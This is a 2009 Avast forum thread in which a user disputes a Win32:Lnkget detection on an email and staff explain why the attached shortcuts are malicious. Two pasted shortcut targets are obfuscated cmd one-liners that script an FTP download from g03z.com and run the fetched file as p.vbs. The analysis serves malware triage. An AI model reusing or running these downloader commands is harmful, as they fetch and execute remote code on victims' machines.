Avast WEBforum
Consumer Products => Avast Free Antivirus / Premium Security (legacy Pro Antivirus, Internet Security, Premier) => Topic started by: dude2 on September 07, 2009, 10:06:34 AM
-
I received an email and reported by Avast Home as infected by Win32:Lnkget. Uploaded this email to Virus Total(http://www.virustotal.com/) for scanning and analysis. The result can be found here. http://www.virustotal.com/analisis/de3b90893777ef57a4f5710465e54af0524b5c0c6938d97a16885bf7edb5b542-1252306731
There are 9 out of 41 Antivirus software products reporting this email containing malware link. Other 32 consider this email clean. How to tell if it is not false positive?
-
Hi,
you can send this file to us using avast! warning dialog, as shown in picture below, and we will analyze that. If it is false positive we will fix it.
Milos
-
Hi,
it looks, that you email contains some attachement with a shortcut (file with .lnk extension), that looks like picture below (right click -> Properities). See part the called "Target". If it looks similar it's not false positive.
Milos
-
Hi,
it looks, that you email contains some attachement with a shortcut (file with .lnk extension), that looks like picture below (right click -> Properities). See part the called "Target". If it looks similar it's not false positive.
Milos
Hi, Milos,
There are two identical lnk shortcuts (but with different lnk names) attached in the suspected email. For your reference, I hereby copied their "Target" settings:
lnk1: %ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m&echo start p.vbs>>m&ren m t.bat&t.bat&
lnk2: %ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m&echo start p.vbs>>m&ren m t.bat&t.bat&
Are these scripts supposed to download stuff and even execute some on my system? But, my question is how to tell if these scripts will do real damage to my system, such as deleting system files, altering Windows registry, or openning a back door as a Trojan. Could my XP system be that vulnerable as to be totally controlled by such scripts? Above all, why did the other 32 Antivirus software products from VirusTotal check it and let it pass?
Dan
-
Hi dude2,
script in the "Target" creates script for ftp (address ftp.g03z.com) with filled in username and password and tries to download file "p" and store them as "p.vbs" in %windir% (from the shortcut properities "Start in") and then run the "p.vbs". But the file "p" doesn't exist this time on then ftp server, so "p.vbs" is empty and does nothing (no real damage to your system).
Why other antivirus software products from VirusTotal check it and let it pass? I don't know, maybe they didn't analyze this file.
Milos
-
Milos, thank you for your thorough investigation on this issue.
But, here comes the hazy part of this odd problem. If a friend sends me an email with a lnk which can lead me to his well-arranged script procedure, and if I click on that lnk it starts the scripts automatically as intended and simply DOES NO HARM to the Windows system. In that case, will Avast still detect that email as suspected of Win32:Lnkget infection because of some automated scripts getting executed?
Or, does there need to be any harmful signatures or patterns of the activities of the executed scripts which match Avast iAVS DB and therefore trigger the alarm? For example, the suspected scripts are manipulating the system or put users in the harm way.
If you said that the file "p" doesn't exist at this time on that ftp server and therefore this script can do no harm to my system, and if this email message is still detected by Avast! as infected as of today, then I wonder whether it is detected simply because of embedded scripts in lnk reference. If it is the case, to me it is more like a "access control related issue" and users need to wisely set their system so that they do not easily trigger something unexpectedly. Could that be the reason that the other antivirus software products can not conclude this email infected simply from finding embedded scripts, but instead needing more evidence on suspected activities?
Thank you,
Dan
-
But, here comes the hazy part of this odd problem. If a friend sends me an email with a lnk which can lead me to his well-arranged script procedure, and if I click on that lnk it starts the scripts automatically as intended and simply DOES NO HARM to the Windows system. In that case, will Avast still detect that email as suspected of Win32:Lnkget infection because of some automated scripts getting executed?
Yes avast! will still detect that email -- when avast! scan that .lnk file it doesn't know if the file on ftp server exists. If you don't disable avast! it doesn't allow you to run this script.
Or, does there need to be any harmful signatures or patterns of the activities of the executed scripts which match Avast iAVS DB and therefore trigger the alarm? For example, the suspected scripts are manipulating the system or put users in the harm way.
Yes.
If you said that the file "p" doesn't exist at this time on that ftp server and therefore this script can do no harm to my system, and if this email message is still detected by Avast! as infected as of today, then I wonder whether it is detected simply because of embedded scripts in lnk reference. If it is the case, to me it is more like a "access control related issue" and users need to wisely set their system so that they do not easily trigger something unexpectedly. Could that be the reason that the other antivirus software products can not conclude this email infected simply from finding embedded scripts, but instead needing more evidence on suspected activities?
I think, that it will be hard work to analyze some script in AV engine and login to some ftp server using data gathered from analyzed scipt and check if file exist, download it and again check if it's harmful (you can see here posibility of long time processing).
If you receive some suspected email or program which you don't trust you can run it in some virtual machine and see if it is doing some bad things -- you can than return to previous state before infection.
Milos
-
Yes, the lnks' targets contain scripts, but I did not see the suspected scripts are manipulating the system or put users in the harm way, simply because the file "p" doesn't even exist on the remote FTP server during the test. If some of those VirusTotal-listed 32 antivirus software products that DID NOT SHOW POSITIVE come with the file emulation or some heuristic analysis capability and they do not find those scripts doing any harm other than trying to connect to a remote site and to download and execut unharmful stuff, then are we safe to say it is a false positive or maybe a little overcautious? Or, do you think the test results from those 32 out of 41 AV products are false negative?
-
If you look on the script, you can see, that there are is no direct ftp address (it is substituted during runtime) some commands are substituted same way, so what is the reason to do that? It is considered as malware practices to hide the real behavior, so others AV are false negative.
-
Are those scripts at most being considered as mischievous? Or, do they really manipulate the system to the extent of degrading system performance or security or put users in the harm's way? Once that is clarified, I may concur more on the false positive or false negative conclusion.
If you look on the script, you can see, that there are is no direct ftp address (it is substituted during runtime) some commands are substituted same way, so what is the reason to do that? It is considered as malware practices to hide the real behavior, so others AV are false negative.
I do not know the reason of using substituted ftp address during the runtime. But, could a legitimate script or program using the similar technique? Doesn't Windows system itself take ftp address as an argument in its command line or FTP app environment? Again it is only my immature opinion, can we judge a script simply by its programming techniques?
-
Are those scripts at most being considered as mischievous?
a) If you think the script which are downloaded from ftp -- I don't remember. But the script is downloaded from strange url g03z.com (you can see owner and other properities: http://whois.domaintools.com/g03z.com or picture below).
b) If you think the script from .lnk -- yes.
In case of this .lnk file, there is no reason to obfuscate the script. so It can be considered as malicious plus WHOIS informations.
Legitimate script has no reason to obfuscate the ftp address.
-
There is no argue that the site administrator's identity does look suspicious based on the registration info on whois, and it is just as suspicious to have scripts embedded in lnk, especially doing ftp and downloading stuff. But, what trait makes it more than just suspicious or somewhat obfuscating but honored enough to join the Avast!iAVS/VPS still buffles me. I think a so-called malware needs to manipulate the system to the extent of degrading system performance or security or to put users in the harm's way.
Based on http://www.avast.com/eng/vps-content-2009.html, Avast! honored Win32:Lnkget as a Trojan in its VPS. But, base on http://www.viruslist.com/en/virusesdescribed and http://www.viruslist.com/en/virusesdescribed?chapter=152540521, a Trojan, especially a Trojan Downloader, needs to download and install new malware or adware on the victim machine. Meanwhile, a Trojan Dropper is composed of at least a dangerous payload and a harmless hoax, such as jokes, games, graphics and so forth. What if the downloaded stuff can not be detected as malware, adware, or dangerous payload?
-
It depends on case-by-case.
-
It depends on case-by-case.
Can you elaborate on that? Be more specific on my case, please.
-
It depends on case-by-case.
Can you elaborate on that? Be more specific on my case, please.
The file on ftp server doesn't exist, so I can't be more specific.
-
As I questioned in #11, if an embedded script was downloading unharmful stuff or even failed to download stuff because the target file on the ftp server was not there, then can we still categorize this script as Trojan Downloader, Trojan Dropper, or any type of Trojan? I am trying to understand what type of Trojan Win32:Lnkget is. If Win32:Lnkget was overcautious on suspicious downloading activities, should we count it as a false positive?
-
Yes, we can still categorize this script as Trojan, because we don't know if the file will in the future appear on the ftp server.
-
Yes, we can still categorize this script as Trojan, because we don't know if the file will in the future appear on the ftp server.
Based on Alwil's VPS record, when Avast initially captured and categorized this as Win32:Lnkget Trojan, what was seen as the downloaded dangerous payload or downloaded malware?
Even if there was something downloaded that triggered Avast back then, but how can it still trigger Avast to generate an alarm now when there is no file to download?
Unless somehow lnk-embedded downloading command script itself will trigger Avast to detect it as a Trojan doesn't matter if the downloaded stuff is harmful or if downloading action is ever completed? But, in that case, wouldn't this Trojan decision be too lax in comparison with Trojan definition in http://www.viruslist.com/en/virusesdescribed and http://www.viruslist.com/en/virusesdescribed?chapter=152540521 ?
-
Yes, we can still categorize this script as Trojan, because we don't know if the file will in the future appear on the ftp server.
Based on Alwil's VPS record, when Avast initially captured and categorized this as Win32:Lnkget Trojan, what was seen as the downloaded dangerous payload or downloaded malware?
Who knows ...
Even if there was something downloaded that triggered Avast back then, but how can it still trigger Avast to generate an alarm now when there is no file to download?
Unless somehow lnk-embedded downloading command script itself will trigger Avast to detect it as a Trojan doesn't matter if the downloaded stuff is harmful or if downloading action is ever completed? But, in that case, wouldn't this Trojan decision be too lax in comparison with Trojan definition in http://www.viruslist.com/en/virusesdescribed and http://www.viruslist.com/en/virusesdescribed?chapter=152540521 ?
It depends on type of detection http://en.wikipedia.org/wiki/Antivirus_software#Identification_methods, this one detects malicious .lnk file nothing else -- it doesn't try to download other files and analyze them, its not "File emulation".
I'm still not sure what is your problem?
-
After all, I do not think that you have the key info:
"How malicious is the script from this lnk?" or "what constitutes Win32:Lnkget Trojan?"
Based on your provided reference link: http://en.wikipedia.org/wiki/Antivirus_software#Identification_methods , it says:
>>
Malicious activity detection is another approach used to identify malware. In this approach, antivirus software monitors the system for suspicious program behavior. If suspicious behavior is detected, the suspect program may be further investigated, using signature based detection or another method listed in this section. This type of detection can be used to identify unknown viruses or variants on existing viruses.
<<
All referenced links pointed to the key idea:
"It takes a little more investigation to distinguish a malware from a suspicious false positive."
Normally, this investigation will reveal the true identity of the suspicious script. From Viruslist.com, a Trojan dropper/downloader will be identified as either a dangerous payload or a malware/adware with the help of a signature or other methods. I suspect that could be the reason some 32 out of 41 AV software products would not categorize it as a Trojan downloader/dropper when this script can not be downloaded from the ftp server for further investigation.
If Alwil is not about to provide the key info with regard to what the damaging activity signature it had when Win32:Lnkget was first created, then who knows? I may have to rest my case here. Your help thus far is appreciated nonetheless.
-
After all, I do not think that you have the key info:
"How malicious is the script from this lnk?" or "what constitutes Win32:Lnkget Trojan?"
I think, that the behavior of the script in the .lnk file was described and the script on ftp server (which is now inaccessible) can be changed anytime, so who knows, what it will be doing? The detection Win32:Lnkget just detects the script in .lnk file, which downloads and runs some another script.
-
After all, I do not think that you have the key info:
"How malicious is the script from this lnk?" or "what constitutes Win32:Lnkget Trojan?"
I think, that the behavior of the script in the .lnk file was described and the script on ftp server (which is now inaccessible) can be changed anytime, so who knows, what it will be doing? The detection Win32:Lnkget just detects the script in .lnk file, which downloads and runs some another script.
Welcome back, Milos. Do you agree to all those references' saying that Trojan downloaders/droppers DO NOT JUST TRY TO DOWNLOAD "SUSPICIOUS SCRIPTS" BUT TO DOWNLOAD AND EXECUTE "MALCIOUS SCRIPTS" BASED ON THE "IDENTIFIED SIGNATURE" OR "DETECTED ABNORMAL BEHAVIOR IN THE FILE EMULATION" PROCESS?
Unless you do not agree with those references, you should have seen the catch. I do not have the signature of Trojan Win32:Lnkget, when it was built into VPS DB, to show its malicious intention, nor can Avast emulate anything out of nothing downloaded from the ftp server. How can I be sure that there was ever a malicious script on that ftp server? Moreover, how can a failed download process still have what it takes in the signature?
To prove it is not just a hoax or false positive but rather a real threat, especially on a controversial case where 32 out of 41 AV products gave a different opinion, I do encourage Avast to go the extra mile after this much already provided help.
-
I dare not to say butter would not melt in the envelop of the suspected email ;), but with Reply#21 unanswered I am not convinced either that Avast's explanations and provided evidences cleared all doubts and proved those 32 AV product vendors giving false negative results.
It seems I may have to present my case with the info received from Avast thus far to third party organizations for their opinions. Win32:Lnkget or FP? I hope the answer will be found and justified soon.
-
Too bad we're still missing your point and we're speding time and resources on this thread.
The point of catching the downloader is to have multi-layered protection. The best way is to catch the downloader and the downloaded stuff. We catch the downloader which is still capable of doing the harm as soon as the site it's pointing to comes alive.
Even if somebody would use the very same lnk obfuscated .bat file for 'legal' reasons, it'd be still detected by us (because of the sheer stupidity of doing so in this way).
We don't care much if other products have false negatives or not, it's their problem, not ours.
I don't think there exists any reason to continue in this thread since everything was said already and we'll stick to our point.